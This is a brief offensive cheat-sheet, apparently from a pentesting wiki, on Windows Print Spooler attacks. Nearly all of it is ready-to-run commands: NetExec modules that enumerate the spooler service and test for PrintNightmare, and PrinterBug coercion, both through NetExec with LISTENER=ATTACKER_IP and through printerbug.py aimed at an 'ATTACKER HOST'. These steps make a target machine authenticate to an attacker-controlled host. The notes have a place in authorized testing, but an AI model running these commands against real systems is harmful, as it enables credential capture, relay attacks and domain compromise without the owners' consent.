Last updated 2 months ago
Was this helpful?
nxc smb <ip> -u 'user' -p 'pass' -M spooler
https://bsky.app/profile/itm4n.bsky.social/post/3lcipb7lq4k2v
nxc smb IP_RANGE -u username -p password -M printerbug -o LISTENER=ATTACKER_IP
or with printerbug.py
printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'
NetNTLMV1 ?
nxc <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M spooler -M printnightmare